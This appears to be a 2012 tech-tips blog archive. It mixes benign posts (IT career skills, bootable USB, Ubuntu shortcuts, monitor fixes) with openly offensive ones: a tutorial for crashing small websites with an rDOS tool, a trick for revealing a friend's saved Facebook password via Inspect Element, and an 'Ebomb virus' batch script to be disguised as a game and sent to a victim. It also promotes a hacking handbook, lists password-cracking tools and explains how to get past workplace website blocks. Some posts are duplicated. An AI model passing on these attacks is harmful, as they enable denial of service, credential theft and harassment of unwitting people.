Thursday, August 2, 2012
11 things need to an it pro
Eleven Skills Every
IT Pro Needs to
Succeed
Randy Muller, MCT, MCTS, MCSE, CEH, Global
Knowledge Instructor
July 2012
One of the interesting aspects of the IT industry is
the continuous need to update current skills and
learn entirely new ones. There are far too many
skills for an IT Pro to even attempt to master,
however . there are some skills that IT Pros who
are serious about managing their career should
know. The following list includes some of the key
IT skills, and whilethere are 11 skills mentioned in
this article, this list should not be considered as all-
inclusive. Your own IT environment will determine
the applicability, depending upon the size of the IT
infrastructure and environment.
1. Virtualization and VDI
There are numerous virtualization technologies
available, including Microsoft Hyper-V, VMware
vSphere, Citrix XenServer, and Oracle VM
VirtualBox that can be used to reduce the physical
number of servers required by a company.
Virtualization has been adopted by companies of
all sizes as a means to reduce costs through the
consolidation of physical servers and lower overall
cooling and electrical usage. Application
Virtualization has become very popular with
businesses. Having the skill set to deploy
applications that connect securely through a
browser is critical for companies with numerous
offices and remote users.
Virtual Desktop Infrastructure is another facet of
the virtualized environment. Using VDI, a
virtualized desktop is stored on a remote server
and when clients work on their "local" system, the
applications, data, processes, and programs are
kept and run on a central server. This enables a
local system with older hardware to run more
advanced operating systems and applications than
would normally be the case with their current
systems. This also means that you might be able to
use non-traditional platforms, such as a tablet, to
run these applications, in addition to their
traditional systems. Virtualization can aid in near
real-time response to network conditions by
providing for more disaster recovery capabilities.
Another use for virtualization is for improved
instruction for IT education and elsewhere, since
there is no longer a need to have large numbers
of computers for classrooms.
2. Cloud
"To the Cloud" - that seems to be the current
mantra in the business world. The cloud can
compose one of several business models
including:
SaaS (Software as a Service), where a single
application is available through a browser
IaaS (Infrastructure as a Service), the most basic
model, where you may "rent" servers or VMs
PaaS (Platform as a Service), where an entire
computing environment is available
The cloud represents the next phase of computing
(with VDI as part of this environment). Microsoft
has invested heavily in the cloud (Azure and the
new System Center 2012) as well as Amazon, HP,
and IBM. Knowing how to leverage and configure
clients for cloud computing will be an invaluable
skill for IT professionals.
3. Interoperability (Networking)
Interoperability is the key here. There are a few
medium and larger IT departments with only a
single platform type or a single manufacturer of
networking equipment; these are the exceptions,
and they are rare. In a typical IT environment, we
tend to work in a highly connected world of
disparate platforms, communications modalities
(BYOD - bring your own device comes to mind),
and operating systems. As an IT Pro, you should
understand how these devices and platforms
communicate and what communication protocols
are used in this process. This also includes
connecting and securing wireless networks, as well
as the use of open source programs and
operating systems.
4. Database Administration and Business
Intelligence
Access to information is critical in today's global
environment. Corporations are even more
dependent on a quick and reliable means to
process and retrieve information. This means they
must operate their own servers or have access to
databases and business intelligence software to
access this information in order to grow and
become more successful. Regulatory compliance
has had a huge impact on database management
and data retention. Corporations are required to
retain financial information, emails, and other
communications for a number of years. Storage
space and solutions have become much cheaper,
so there is more emphasis on data retention.
Having the ability to create and extract information
from one of these databases is critical.
Many of Microsoft's platforms require access to a
SQL server, such as Lync Server and SharePoint.
This means that IT Pros should be able to
administer and maintain these servers, but do not
need to become database administrators
themselves (though it certainly wouldn't hurt).
5. Wireless
In our highly connected world, we expect to be
able to connect wirelessly from almost any device,
from practically anywhere at any time, with
seamless transition. Wireless experts who can
install, configure, and maintain secure wireless
networks are in high demand, with the emphasis
on "secure." Implementing a secure wireless
environment also means being able to plan and
troubleshoot for growth and interferences (as well
as possible compromise). Anyone managing
wireless environments must be able to handle the
calls that come in from remote users who are
having problems with their wireless equipment
running on different operating systems
6. Disaster Recovery
Disaster planning and recovery is as much a
methodology as it is a skill set. IT Pros must be
able plan, test, and implement a disaster recovery
(DR) plan. The planning part seems be done more
frequently than the testing of the actual plans.
Having a DR plan is critical for the survivability of a
data center or network, but testing a disaster
recovery plan is one of the most difficult tasks to
schedule. There is rarely enough time (or
budgetary resources) available to perform the
critical tasks that need to get done in a network
without adding a yearly or semi-yearly test of the
DR plan. An integral part of the disaster recovery
process is implementing fault-tolerant systems and
providing for redundancy in your network.
7. Security
Network and computer security concerns and
requirements have dramatically increased. Security
professionals are in high demand and this will only
multiply in the coming years. As an IT Pro, you
must have a good understanding of both physical
and electronic security.Some of the most difficult
tasks with IT security involve educating users and
implementing effective security measures. There is
a lot of information that can be gleaned through
social media sites and social engineering that most
companies would rather not have divulged.
Training users (and IT staff) to be aware of these
vulnerabilities is extremely difficult. IT Pros must
always be aware of security issues and understand
the vulnerabilities within their networks (from
operating systems, servers down to the cable
closet). This does not mean that every IT Pro must
be able to perform a penetration test against his
or her own network, but they must understand
and prevent attacks against their network and
prevent disclosure of confidential information.
8. Imaging
Pick your imaging software/platform of choice as
imaging will continue to be a valuable skill for
some time (despite the rise of virtualization).
Systems imaging is a critical skill as companies are
shifting to standardized desktops and
deployments. Part of this is done to deploy a
consistent and secure platform as well as to
provide ease of management. There are many
imaging programs available, as well as Microsoft's
Windows Deployment Services and imaging
utilities.
9. Helpdesk or People Skills
Knowing how to interact with non-technical people
is a critical skill. This interaction must be based on
the ability to effectively communicate, in words and
language that the client can understand. A
companies' help desk tends to be the "face" that
most users will have with the IT department, and
this should be a positive experience. IT Pros are
very good at their jobs, but sometimes (and I
know that this will come as a shock to everyone)
they are not skilled in relating to their non-tech
colleagues. Users just want their computers fixed
or their data recovered and are not concerned
with the processes behind our actions. IT Pros
should have some experience working at the Help
Desk.
10. The Noble Art and Science of
Troubleshooting
There are some IT skills that simply do not lend
themselves to a short description, and
troubleshooting is definitely one that falls into this
category. Is troubleshooting a skill, an art, or is it
both? If you ask any seasoned IT professionals,
they will tell you that having troubleshooting
knowledge is important, but not as important as
knowing how to troubleshoot. This is one IT skill
that cannot be easily taught (some might even say
that you are born with the skill).The problem with
troubleshooting is that it is a unique skill set that
corporations are continuously seeking but simply
do not have the time or money to invest in
training. If you are talented at troubleshooting a
specific program or system, then you become the
"go-to" person - a valuable skill and commodity for
your company. One would think that there would
be more emphasis on teaching and sharing even
the basics of troubleshooting, but sadly, this is not
always the case.
11. PowerShell (and other scripting)
Knowing how to use PowerShell (or other scripting
technologies) to automate many common
administrative tasks not only saves time that can
be used on other (perhaps more critical)
administrative tasks, but may increase your value
to your employer as well. Knowing PowerShell or
scripting is an important skill in today's IT
environments. This does not mean that you must
become a programmer in order to become a
successful network engineer, but you must master
the ability to create and run scripts to automate
some administrative tasks. Most of Microsoft's
newer technologies, including Exchange,
SharePoint, SQL,and Lync have some
administrative functions that can ONLY be
implemented with PowerShell.
The range of IT skills can be a tricky thing to
quantify and qualify. What is useful in one
environment may not be so in another. This article
lists some of the most common skills that an IT Pro
should know. If you don't know some of these
areas, now is the time to learn them. One thing to
keep in mind is that you are your own best career
manager! You are the only one who can
determine which career path to take.
Monday, July 23, 2012
hackers underground book
The Hacker’s Underground Handbook The Hacker’s Underground Handbook Learn What it Takes to Crack Even the Most Secure Systems By: David Melnichuk The Hacker’s Underground Handbook will guide you through password hacking, windows hacking, malware, phising, web hacking, network hacking and Linux (intro, installation, etc). All this material fully packed with images, thus being a top step-by-step guide, on the course of which you cannot fail. A great starting book which will guide you in the right direction, helping you understand the basic concepts of computer security and matters that you should take in consideration. Download Here:
Monday, July 16, 2012
How to burn ISO to USB - make bootable USB
Many times we face a problem when our cd/dvd do not work and we have to use bootable USB drive for system formatting. For this you can use ISO to USB. You can guess about its working by its name. This free utility works on windows XP, Vista and 7. Once you hahve downloaded this utility, the use of this tool is simple. Attach the USB on the system and browse the iso image you want to burn. If its bootable Windows ISO file then you can make bootable USB drive by checking Bootable option. Click on burn button to start the ISO file burning process. Download this tool here: http://www.isotousb.com/
Sunday, June 17, 2012
Portable desktop search tool for USB drives
You have a portable hard drive and you carry it with you where ever you go. But finding a file it on a system can cause you a problem because you can not search it from the windows search tool. because it is not indexed yet. In that case, suppose you have 500 GB external hard drive and you do not know how to search for a file in inside the hard drive. You can not wait for windows to index files for searching. In this case i have a better solution.
Now you can search the whole disk with it anytime anywhere.
It creates it's own index at first run inside the USB and search index updates itself whenever you run Dropout next so your new / updated files are automatically included.
Features:
- Super fast searching <1sec
- Totally portable
- Search multiple directories
- Exclude files
- Incremental indexing of files
- Background indexing allows you to search during indexing
- Indexing ALL text files
- Search history via auto complete
- Sorting of result list
- Only .NET 2.0 required
- Single exe created using IL-Merge
- Configurable via ini file (not required)
- Open the file from the interface
- Open the containing directory from the interface
Thursday, May 31, 2012
Password Protect Bookmarks in Google Chrome
Want to protect your bookmarks from unauthorized access??
There is an easy way. Secure Bookmarks is a nice Google Chrome extension which
allows users to add a password protection to their bookmark list. This is
really a nice idea, if you share your computer with others. With the use of
this extension, you can protect your favorite links from others.
After installing this extension to your Google Chrome web
browser, You will see a star icon near the address bar. Clicking on this icon first
time will take you to a new page which asks the password. Now you are ready to
secure your bookmark list.
Whenever you want to save any link as bookmark, simple click
at the star icon of the extension and then click on "create new
bookmark" button. Save as many links as you can. To change the position on
the list, you can simply drag the bookmark link to the new place.
You'll find three more icons in the top right corner of
Secure Bookmarks.
- First icon is to delete all bookmarks. You will be asked for confirmation if you press this button.
- Second icon is to visit the Secure Bookmarks settings page.
- Third icon is to Sign off to end your Secure Bookmarks session.
When you are done and going to close your browser or giving
your system to someone else, click on sign off button.
Next time when you will try to access your bookmarks, it
will ask for the password. Enter the password to access your bookmarks again.
NOTE: This extension does not allow any type of password
recovery. In case you forget your password, you will have to reset the
extension. And you will lose your saved links.
If you want to enjoy this extension in incognito mode, go to
Tools >> Extensions (or type chrome://settings/extensions in the address
bar) and expand the Secure Bookmarks entry. Tick the 'Allow in incognito'
checkbox.
Set permanent delete on delete key
DEL key is used for delete and file and send it to the recycle bin
in windows. Recycle is used to recover those files which have been
deleted accidently. But most of the people do not use only delete
button to delete files.
They use shift+ del to delete the file permanent. For those people, it
is better to set permanent delete on DEL key. Thus they do not need to
press shift+ del key to delete a file permanently.
Follow these steps:
Now you have done. Delete the file anytime and it will not go to the recycle bin
Follow these steps:
- Click on start and then run.
- Type gpedit.msc in the box and press enter. It will open a group policy window.
- Navigate to the User Configuration - >Administrative Templates
- >Windows Components>Windows Explorer
- In the right side settings menu double click--Donot move deleted file to Recycle bin.
- >click OK.
Now you have done. Delete the file anytime and it will not go to the recycle bin
Keyboard Shortcut for UBUNTO
UBUNTU is one of the popular operating system based on LINUX. It has a good number of users after fedora. I have already posted keyboard shortcuts for different web browsers and operating system. Today i am posting keyboard shortcuts for UBUNTU which will help you to work faster
Ctrl + A = Select all
Ctrl + C = Copy the highlighted content to clipboard
Ctrl + V = Paste the clipboard content
Ctrl + N = New (Create a new document, not in terminal)
Ctrl + O = Open a document
Ctrl + S = Save the current document
Ctrl + P = Print the current document
Ctrl + W = Close the close document
Ctrl + Q = Quit the current applicationKeyboard shortcuts for GNOME desktopCtrl + Alt + F1 = Switch to the first virtual terminal
Ctrl + Alt + F2(F3)(F4)(F5)(F6) = Select the different virtual terminals
Ctrl + Alt + F7 = Restore back to the current terminal session with X
Ctrl + Alt + Backspace = Restart GNOME
Alt + Tab = Switch between open programs
Ctrl + Alt + L = Lock the screen.
Alt + F1 = opens the Applications menu
Alt + F2 = opens the Run Application dialog box.
Alt + F3 = opens the Deskbar Applet
Alt + F4 = closes the current window.
Alt + F5 = unmaximizes the current window
Alt + F7 = move the current window
Alt + F8 = resizes the current window.
Alt + F9 = minimizes the current window.
Alt + F10 = maximizes the current window
Alt + Space = opens the window menu.
Ctrl + Alt + + = Switch to next X resolution
Ctrl + Alt + - = Switch to previous X resolution
Ctrl + Alt + Left/Right = move to the next/previous workspaceKeyboard shortcuts for TerminalCtrl + A = Move cursor to beginning of line
Ctrl + E = Move cursor to end of line
Ctrl + C = kills the current process.
Ctrl + Z = sends the current process to the background.
Ctrl + D = logs you out.
Ctrl + R = finds the last command matching the entered letters.
Enter a letter, followed by Tab + Tab = lists the available commands beginning with those letters.
Ctrl + U = deletes the current line.
Ctrl + K = deletes the command from the cursor right.
Ctrl + W = deletes the word before the cursor.
Ctrl + L = clears the terminal output
Shift + Ctrl + C = copy the highlighted command to the clipboard.
Shift + Ctrl + V (or Shift + Insert) = pastes the contents of the clipboard.
Alt + F = moves forward one word.
Alt + B = moves backward one word
Arrow Up/Down = browse command history
Shift + PageUp / PageDown = Scroll terminal outputKeyboard shortcuts for CompizAlt + Tab = switch between open windows
Win + Tab = switch between open windows with Shift Switcher or Ring Switcher effect
Win + E = Expo, show all workspace
Ctrl + Alt + Down = Film Effect
Ctrl + Alt + Left mouse button = Rotate Desktop Cube
Alt + Shift + Up = Scale Windows
Ctrl + Alt + D = Show Desktop
Win + Left mouse button = take screenshot on selected area
Win + Mousewheel = Zoom In/Out
Alt + Mousewheel = Transparent Window
Alt + F8 = Resize Window
Alt + F7 = Move Window
Win + P = Add Helper
F9 = show widget layer
Shift + F9 = show water effects
Win + Shift + Left mouse button = Fire Effects
Win + Shift + C = Clear Fire Effects
Win + Left mouse button = Annotate: Draw
Win + 1 = Start annotation
Win + 3 = End annotation
Win + S = selects windows for grouping
Win + T = Group Windows together
Win + U = Ungroup Windows
Win + Left/Right = Flip WindowsKeyboard shortcut for NautilusShift + Ctrl + N = Create New Folder
Ctrl + T = Delete selected file(s) to trash
Alt + ENTER = Show File/Folder Properties
Ctrl + 1 = Toggle View As Icons
Ctrl + 2 = Toggle View As List
Shift + Right = Open Directory (Only in List View)
Shift + Left = Close Directory (Only in List View)
Ctrl + S = Select Pattern
F2 = Rename File
Ctrl + A = Select all files and folders
Ctrl + W = Close Window
Ctrl + Shift + W = Close All Nautilus Windows
Ctrl + R = Reload Nautilus Window
Alt + Up = Open parent directory
Alt + Left = Back
Alt + Right = Forward
Alt + Home = go to Home folder
Ctrl + L = go to location bar
F9 = Show sidepane
Ctrl + H = Show Hidden Files
Ctrl + + = Zoom In
Ctrl + - = Zoom Out
Top Password Cracking Tools
In
this post i am going to write about various password cracking tools.
These password cracking tools includes, network password cracking,
windows password cracking, ftp, http, telnet, IMAP, rlogin, SSH and various other protocol password cracking tools.
These are some popular password cracking tools:
Cain and Abel: This is a free password cracking tool for windows systems. It allows users to recover various kind of passwords. This password cracking tool recover passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and crypt-analysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
John the Ripper: John the Ripper is a fast password crcking tool available for UNIX/Linux and Mac OS X platforms. This is not a free tool but there is a free trail version available to download.
Ophcrack: Ophcrack is a best windows password crcking tool. It is a rainbow-table based windows password cracker. Features of this cracking tool includes LM and NTLM hash cracking, a GUI, the ability to load hashes from encrypted SAM recovered from a Windows partition, and a Live CD version.
THC Hydra: THC Hydra is a a remote password cracking tool. It supports various network protocols including telnet, ftp, http, https, smb, several databases, and much more.
Brutus: This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NNTP, and more.
Medusa: Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.
Aircrack: Aircrack is a famous wireless network password cracking tool. This is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. . The suite comprises over a dozen discrete tools, including airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).
These are some popular password cracking tools:
Cain and Abel: This is a free password cracking tool for windows systems. It allows users to recover various kind of passwords. This password cracking tool recover passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and crypt-analysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
John the Ripper: John the Ripper is a fast password crcking tool available for UNIX/Linux and Mac OS X platforms. This is not a free tool but there is a free trail version available to download.
Ophcrack: Ophcrack is a best windows password crcking tool. It is a rainbow-table based windows password cracker. Features of this cracking tool includes LM and NTLM hash cracking, a GUI, the ability to load hashes from encrypted SAM recovered from a Windows partition, and a Live CD version.
THC Hydra: THC Hydra is a a remote password cracking tool. It supports various network protocols including telnet, ftp, http, https, smb, several databases, and much more.
Brutus: This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NNTP, and more.
Medusa: Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.
Aircrack: Aircrack is a famous wireless network password cracking tool. This is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. . The suite comprises over a dozen discrete tools, including airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).
How to crash small websites using RDOS | DOS tutorial
DOS TUTORIAL
How to crash small websites using RDOS
Have you ever wanted to DOS attack on a website. Here I am going to write about a tool which is really helpful but it wouldn't be effective on big servers.
NOTE: Please do not try to this tutorial to harm any other's website. I will not be responsible in any case. If you are not agree, please leave this website without reading further tutorial
for cool computer tricks click here
You need:
- Port Scanner Download Here
- rDOS Download Here
- Ip Hiding tool Download Here
Follow these steps:
Use ping command in windows to get the ip address of the website.
open CMD and enter ping www.website.com
see the snap
Now you have the IP address of the website.
2: Now use Port scanner to check whether PORT 80 is open or not. If PORT 80 is not open choose another website to hack :P
otherwise you can crash this website.
3: Now open your rDos. Enter your victims ip that you got from step 1.
It
will ask you for the port to attack use port 80 that’s why we scanned
to make sure that 80 was open! If it is closed it will not workWednesday, May 30, 2012
Monitor goes out of frequency and does not display anything
Problem:
Monitors have a limit of maximum supported frequency (Refresh rate) for each resolution setting at which display is refreshed. When you set a high resolution with a high frequency that is not supported by the monitor, it displays a message Frequency out of range. Within a few seconds of setting the frequency if you press Esc key it will revert back to the previous resolution.
But what if when you are stuck with the same Frequency out of range and your monitor does not display anything.
Don’t worry, we have the solution if your monitor doesn’t display anything
Solution:
1. Boot in VGA mode by keep pressing F8 key during boot-up.
2. Un-install the display driver
3. Set the display settings to some supported value
4. Restart, install display (video) driver and set the appropriate settings which your monitor supports.
5. Restart again and it is Fixed.
Tip: Most of old monitors don’t support 1024×768 at a refresh rate greater than 60Hz, so avoid setting this resolution at a frequency higher than 60 Hz if your monitor is an old CRT monitor.
Monitors have a limit of maximum supported frequency (Refresh rate) for each resolution setting at which display is refreshed. When you set a high resolution with a high frequency that is not supported by the monitor, it displays a message Frequency out of range. Within a few seconds of setting the frequency if you press Esc key it will revert back to the previous resolution.
But what if when you are stuck with the same Frequency out of range and your monitor does not display anything.
Don’t worry, we have the solution if your monitor doesn’t display anything
Solution:
1. Boot in VGA mode by keep pressing F8 key during boot-up.
2. Un-install the display driver
3. Set the display settings to some supported value
4. Restart, install display (video) driver and set the appropriate settings which your monitor supports.
5. Restart again and it is Fixed.
Tip: Most of old monitors don’t support 1024×768 at a refresh rate greater than 60Hz, so avoid setting this resolution at a frequency higher than 60 Hz if your monitor is an old CRT monitor.
How to check for safe file before downloading
On the Internet we download many files a day. Some of these are safe but some are infected by virus or other malicious programs. Although we use Antivirus programs to protect our system, but it will be much better to scan a file before downloading on your system. If the download source is unknown or new, then you must check.
VIrusTotal is an online security website which can help you in this. This website scan download links Worth more than 40 different security tools to check whether the file is safe to download or infected.
To scan for a file, right click on the download link and select Copy link address.
Now open new tab in browser and write Virustotal.com and press enter. In the new website, paste the link in the text field and click Submit URL. VirusTotal will send the link to its engine which will check the link against several URL analysis tools to see if the site is black listed as a malicious site already.
After few seconds, it will show you the scan result. If nothing is detected in the scan, you can proceed with the downloading.
Integrating it with FireFox: This security tool is also available as add-on for the FireFox which is called VTZilla. So you do not need to go to the website each time you want to check a link. After installing this tool in your FireFox, you will see a new toolbar from which you can see the status of the website. It also add an option in the right click menu. just right on the link you want to scan and you will find an option " select Scan with VirusTotal." This option will open the scan results in the new tab for the selected URL.
Although the security tool use more than 40 scanners to check the website but you can not blindly trust on it. There may be the new threat on the link which is not listed in all the scanners. So you should use a good antivirus and Internet security solution on your system.
If you are Google Chrome user, you do not need to go for this tool. Just update your web browser. Latest version of Google Chrome has this security service in-built which notifies user when they try to download files from malicious sources.
How to Access Blocked Websites with Opera Portable
Many
times at schools and other workplaces websites like Facebook, YouTube
and many other social networking sites are blocked which you might love
to browse, in that case we have many alternate options the one going
for the use of proxies but well we have another portable idea of
browsing those blocked websites using the opera portable edition which
works quit well.
Using
Opera Portable on a flash drive (so that you can carry it around), run
it on a computer at your workplace and then turn on Opera Turbo,
your browser will send the request to the Opera servers, which will act
as anonymous proxies for you. The network will not be blocking the
Opera servers from communicating with you, and you will be able to
browse the websites safely.
So now any blocked website like social networking or other ones can be browsed safely and anonymously without any problems and that too with your simple portable solution.
So download Opera Portable Edition now, and start browsing anonymously.
So now any blocked website like social networking or other ones can be browsed safely and anonymously without any problems and that too with your simple portable solution.
So download Opera Portable Edition now, and start browsing anonymously.
Monday, May 21, 2012
How to reveal a Facebook password
Today i will be showing you how to reveal your friends facebook password, But before we continue let me tell you its not really hacking its just code manipulation.
- Many times we have seen our friends leaving there system without closing web browser this leads to temp auto filling of data inside the data fields even if you haven’t saved any of it. To be clear have a glance on below image.
- Now the data inside the username and password field is temporarily save, data will disappear as soon as web browser is closed.
- Now this is where our data modification part starts.
- Now a day every browser is integrated with Inspect Element component.
- Right Click in password box and select Inspect Element from menu as shown below.
- Now the tricky work begins.
- There will be many options shown at the bottom of the page select HTML, and your browser should look similar to below image.
- After you have selected HTML version/option you will be able to see page code looking similar to HTML tags, similar to below image.
- Now Double Click on “Password” and you will be able to edit it.
- Change “Password” to “text“, and your browser will look similar to below one.
- Done
- Check your password box
- Vola we did it !
Sunday, February 26, 2012
Ebomb a virus for fun
Ebomb a virus for fun
This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type
@echo off
start iexplore
start notepad
start firefox
and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)
you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)"
and also you can open some websites to irritate victim eg.
start iexplore "www.ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it .............. :D
(Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start iexplore "ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
start firefox "www.maverick-deepanker.blogspot.com"
start notepad
and then simply save it as "anyname.bat"
Note : The only way to get out of any ebomb attack is simply by System restart
Subscribe to:
Posts (Atom)